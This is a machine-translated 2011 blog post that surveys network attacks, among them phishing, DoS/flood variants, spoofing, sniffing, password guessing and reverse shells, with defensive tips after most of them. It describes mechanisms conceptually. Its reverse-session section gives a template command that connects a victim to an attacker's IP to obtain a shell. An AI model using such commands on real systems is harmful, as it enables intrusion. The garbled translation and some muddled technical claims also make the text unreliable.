Main » 2011 » Март » 16 » Common security threats
13:46
Common security threats
All probably know that there are so many different ways to security threats. They are really quite how many of them learn reading under the cut.


All use the link below for a sample taken when they where - that are not there to afftoru pritenzy not show

The same article is available at the following addresses: http://forxakep.ucoz.ru/publ/3-1 -0-16
http://forum.netall.ru/index.php?showtop ...
http://www.inattack.ru/article/402.html

Fishing (or phishing).

A very broad term. Its meaning is to get from users of information (passwords, credit card numbers, etc.) or cash. This technique is not aimed at one user, but in many. For example, a letter allegedly from the technical support be sent to all known customers of any bank. The letters are usually requested to send the password to the account, supposedly because of any technical work. Despite the fact that users are warned that any such information from them, none of the workers may not require, and this information should not be disclosed, are always those who are happy, "gives" their numbers, passwords and so on. Such letters are usually very believable and well-made, that perhaps impresses gullible users. Need to stipulate that the techniques for phishing have a few, in addition to letters. Some of the following techniques when used properly suited for phishing (as a rule, we refer to this in the description of admission).
Recommendation: Remember that paranoia - the best protection. Do not trust anything suspicious, do not give anybody their data. Administrators do not need to know your password, if it is intended for access to their server. They are fully managed server and can see yourself a password or change it.



Social Engineering

Not a technical and psychological tricks. Using data obtained during the inventory, an attacker can call to any user (eg corporate network) as an administrator and try to learn from him, such as a password. This becomes possible when the big networks, users do not know all the employees, and even more may not always accurately recognize them on the phone. In addition, use sophisticated psychological techniques, so the chance of success is greatly increased.
Recommendation: The same. If indeed there is a need, then let the data you want personally. In that case, if you write down your password on paper, do not leave it anywhere and if possible eliminated, and not just throw in the trash.



Viruses.

The most famous common user problem. The essence in implementing the malware in the user's computer. The consequences may be different and depend on the type of virus that infected the computer. But in general - from stealing information to send spam, DDoS attacks, the organization, as well as complete control over your computer. In addition to the letter attached file, a virus can get into the computer via some vulnerability OS, which are described in our article "Rating vulnerabilities Windows». There are a lot of viruses, but it is still possible to classify them. We do not want to reinvent wheel, so you can use the information to this page http://school8.uriit.ru/people/av/class. ... Where a classification of viruses with the description. Slightly more details on this topic revealed here http://fivt.krgtu.ru/kafedri/mo/site/ANT ...
Recommendation: Use antivirus software. Is not limited to DrWEB or Kaspersky Anti-Virus (because they do not check the register), use specialized anti-virus software against Malware, such as Ad-Aware, SpyBot, XSpy. And also, do not open suspicious attachments, and generally not open programs from unknown senders. Even if you know the sender, is still first check for viruses. Here, as in medicine, it is easier to avoid than to cure.



DoS (Denial of Service or Denial of Service).

I wanted to say that this is likely not a separate attack, a result of the attack, used to display the system or individual programs from the system. To this end, the attacker creates a special way to request a program, after which it ceases to function. Perezaruzka required to return the operational status of the program. Often perceived that the DoS, it is the same as the attack type Flood and that generally need to connect all the attacks that lead to failure of the system under the name DoS. It is stipulated that:

--A common terminology is not, there are more unspoken rules that classified the attack, so even under this article, we present, in something the conventional classification.
--As we have said, a denial of service may lead not only to Flood, but, for example, and Buffer Overflow.

Therefore, DoS can be described as the result of an attack. For example: "the effect of denial of service attack made use of such Flood».



Flood (Flood or flow / flooding)

This type is quite controversial, partly it can be attributed to the DoS, but we wanted to highlight it separately. With a certain number of machines (in this case the attack is called a DDoS Distributed Denial of Service. Distributed Denial of Service), usually "zombies" send the victim the maximum number of queries (eg, connection requests). From this victim did not have time to respond to every request, and eventually fails to respond to user requests, ie, You can say that it ceases to function properly. Note: this type of attack can be called bullying when, for example, forums fill a lot of pointless posts. We can distinguish the following types of Flood:

--SYN Flood - Flooding attacked computer packages like SYN. As is known, the computer must respond to such a package package-type SYN / ACK. If too many SYN packets, the computer does not have time to answer each and can not receive packets from other computers.
--ICMP Flood or Ping Flood - Same packages only ICMP. The system should respond to such a package, thereby creating a large number of packages that reduce the productivity (throughput) of the channel.
--Identification Flood (Ident Flood). Similar to the ICMP Flood, but the response to a request to port 113 type identd holds the system longer, so the attack is more effective.
--DNS Flood - attack is directed at the DNS server. They flock to DNS requests that the server does not have time to answer, so your inquiries, he just could not answer. As a result, you can not visit Internet sites.
--DDoS DNS - Attack of the fairly new and we have not met the "well-established" name. In essence, this technique is about the same as the previous one, with the only difference being that the requests come from a large number of machines (the previous type of this does not exclude). Address to which should answer DNS-server for these requests is at the DNS server itself, ie it not only flooded queries DNS, but he's still himself, and sends them away. Thus, the technique is more effective than the previous one, but also more complicated to implement.
--Boink (Bonk, Teardrop) - The victim is sent a huge number of highly fragmented packets, but the fragments are large. For each of the fragmented packet is allocated a special buffer that later will place the other pieces, then to put them together. A huge number of large chunks of buffer overflows and could provoke a crash or emergency stop.
--Pong - the same as any other of these species, the only difference is that the sender's address is spoofed. This gives the attacker some anonymity.

Recommendation: for each OS or router, my, they are usually given in technical documentation. Do not neglect them, clearly limits the number of allowed packets. Unfortunately, some species can not reflect anything other than a physical disconnection. A properly configured firewall (or firewall) is often a panacea.



Smurf (attack aimed at the implementation errors TCP-IP protocol)

Now this kind of attack is considered to be exotic, but earlier, when the TCP-IP protocol was fairly new, it contained some bugs that allow For example, substitute the IP address. However, this type of attack is still used. Some experts distinguish TCP Smurf, UDP Smurf, ICMP Smurf. Of course, this division is based on the type of packets.
References: CISCO switches provide good protection, as well as many others as well as recent software and firewalls, to block broadcasts.


Ping-of-Death (or Jolt, SSPing)
The attack is the fact that the victim is sent a fragmented ICMP packet, but the fragment size is very large (64KB). Older versions of operating systems like Windows 95, hang. This attack can be carried out using the Shadow Security Scanner.
References: easier to upgrade the OS, abandoning the old version.


UDP Storm (UDP Storm)

Used when the victim opened a minimum of two UDP ports, each of which refers to the sender any response. For example, port 37 with the time server sends a request to the current date and time. Attacker sends a UDP packet to one port of the victim, but as the sender specifies the address of the victim and the second open UDP port of the victim. Then, the ports are beginning to respond to each other indefinitely, which lowers productivity. The storm stopped as soon as one of the packets lost (for example, due to an overload of resources).
Recommendation: If possible avoid the use of services, which accept UDP packets, or cut them off from the external network firewalls.


UDP Bomb

The attacker sends a UDP packet to the system with incorrect fields overhead. These can be broken arbitrarily (eg incorrect length of the fields, the structure). This can lead to a crash.
References: update software.


Land


The victim is sent a packet to a specific port, but the sender address is set the same as the victim, and the source port is the port of destination. (Example: recipient: 1.1.1.1 port 111 Sender: 1.1.1.1 port 111). The victim tries to connect to each other, why can occur hang the system. Such an attack could also be 100% effective against some routers.


Mail Bombing («Mail bombing")

If the Victim's computer has a mail server, it sends a huge number of email messages in order to eliminate it from the system. On the one hand, it looks like Flood, but on the other hand, if the messages contain large attachments, which will be checked server antivirus software, then such testing set of incoming attachments can significantly reduce the performance or reduce it to nothing. In addition, these messages are stored on the server's hard drive and can overwhelm him, which can cause DoS. Of course, now, this attack is likely story, but in some cases can still be used.
References: competent mail server settings.


Sniffing (Sniffing or play online)

In that case, if instead of switches in the network hubs are installed, received packets are sent to all computers on the network, and only after the computer detects this package for them or not. If an attacker gains access to a computer, which is included in such a network, or access the network directly, the data transmitted in the redistribution of network segments, including passwords, will be available. Attacker simply put the network card in a listening mode and will accept all packets regardless of whether they were meant to him. You can use the console as sniffers, for example TcpDump (built-in * NIX systems), WinDump (for Windows, but not built), as well as a visualized interface, such as Iris.
References: Use switches instead of hubs, encrypt traffic.


IP Hijack (IP haydzhek)

If you have physical access to a network, an attacker can "bump" in the network cable and act as an intermediary in the transmission of packets, thus he will listen to all traffic between two computers. Very uncomfortable way, which is often not justified, except in cases when no other method can not be realized. Such integration is in itself embarrassing, although there are devices that are a bit easier this task, in particular, they follow the numbering of packages to avoid failure and the possible detection of incursions into the channel. Such a method is used for ATM fraud, but this case is technically more difficult, because unacceptable gap between the bank and ATM, and "penetration" into the canal until it breaks - a task only for highly qualified specialists. In addition, ATMs are now much better established, which excludes the possibility of free physical access to the cable.

References: watch cable access, for example, use the box. Encrypt traffic.


Dummy ARP (False ARP)

ARP server, router or switch knows which IP addresses belong to the MAC (ie, network cards). If possible, physical access to the network, an attacker can forge ARP response and impersonate another machine on the network, getting its IP. Thus, all packets destined to the computer will get it. This is possible if the computer is turned off, otherwise this action will cause a conflict of IP addresses (one network can not be 2 computers with the same IP address).
References: Use the software that informs about changing the MAC address from IP, watch the log files ARP server.


Dummy DNS Server (DNS server false)

If network settings are set to automatic mode is activated, the network computer "asks" (ie, sends a broadcast packet), who will be his DNS server to which he will continue to send DNS queries. If there is physical access to the network, an attacker can intercept a broadcast request and reply that his computer will be the DNS server. After that he will send the victim deceived by any route. For example, the victim wants to go to the bank site and transfer funds, an attacker can send it to your computer, where it will be fabricated form a password. After this password will be owned by an attacker. Rather complicated way, because the attacker must answer the victim before the DNS server.

Recommendation: If possible, restrict access to outsiders.


Fuzzy (Fuzzy)

Filters can be configured to block certain packets, such as UDP. An attacker may fabricate a package so that the filter does not understand that this UDP packet and filter out him, and he gets to the destination. Thus, an attacker can bypass packet filters. This technique is very narrow and is designed for special cases, more precisely those where the relationship does not necessarily have to be bilateral. Two-way communication is impossible in most cases, because basically, if incoming packets are blocked by a specific type at any port, then blocked and outgoing. It turns out that even if the package will be fabricated through a filter (eg on port UDP), then the server responds to it bag of the same type, ie UDP, but it will not cook it on the example of a cracker. Thus this outbound packet will be filtered and will not get to the cracker. Whatever it was, it is worth to protect themselves from such attacks.
References: usually new versions of firewalls provide sufficient protection against this trick.


Puke

attacker fabricates answer ICMP unreachable (Wrong system) that will trigger the client to disconnect from the server. Used rather as an aid in the event that any client should be disconnected from the server for the attack.
Fake unreachable - attacker fabricates a message stating that the package can not be delivered (unreachable), thereby causes the server to think that the client fails and packets are not delivered to its destination. This can cause the server to disable a client. Also adjuvant, similar to the number 17, is directed not only at the client and the server.


IP-Spoofing (Spoofing or spoofing IP addresses)

The attacker replaces your real IP fictitious. This is necessary if access to a resource have only certain IP addresses. Attacker needs to do to change your real IP to "privileged" or "trusted" to gain access. This method can be used differently. Once the two computers have established a connection, checking passwords, an attacker could cause the victim overload network resources, specifically generated packets. Thus, it can redirect traffic to itself and thus bypass the authentication procedure.
References: there may be many, for the reason that a lot of tricks. But it is worth mentioning that the threat to reduce (but probably more difficult legimitivnye compounds) to reduce the time for a packet with SYN flag set and ACK, as well as increase the maximum number of SYN-connection requests in the queue (tcp_max_backlog). You can also use the SYN-Cookies.
Host spoofing (spoofing the host). Very complex technique that requires physical access to the network. Each computer knows the router to which it sends all packets that are then delivered to the router to the destination. When you change the router to each computer is sent to redirect the notification, after which the computer starts to send packets to the new router. An attacker could fabricate such a notice and pass himself off as a router, so he will gain control over the traffic within the network segment.
References: controlling access to network and to changing the router. For example, you can monitor whether all the previous traffic (ie the old connection) "appeared" on the new router.


Selection of a password.

Used to register in the system by guessing the password for your account. There are two types: the selection of all possible combinations of characters (BruteForce) and selection of the dictionary. The first method is more efficient because still there is a combination of characters you entered from the keyboard as a password, but this method is extremely slow, especially if you are taken into account punctuation, etc. The second method is fast but if you entered a word that can not be in the dictionary, for example: "My-New-Password", then pick up in the dictionary it would be impossible. Programs, which serve to password guessing a lot, so we do not think it makes sense to call any particular. Typically, programs, operating system and other passwords stored in encrypted form, so even if an attacker gains access to the file, it will have to decrypt the password. He can do it for days on his home computer.
Recommendation: use complex passwords, it's better with punctuation marks. Limit the number of password attempts. Against decryption password help only its complexity.


Back Connect / Pipes / Reverse (Reverse session or reverse)

This is a helper method, but by itself it is very interesting. For example, an attacker does not want each time to perform many actions for the sake of the team. It can simplify the problem by using this technique. Its essence is that an attacker forces attacked the computer to connect to a computer hacker. For example on the victim computer, you can run telnet [ip.adres.vzlomschika] [port]. After this, the attacker is in fact receives a command prompt (or shell Shell / Shell) on the victim machine.


Software vulnerabilities (Mistake)
Views: 1167 | Added by: w1zard | Rating: 0.0/0
Total comments: 0
Имя *:
Email *:
Код *: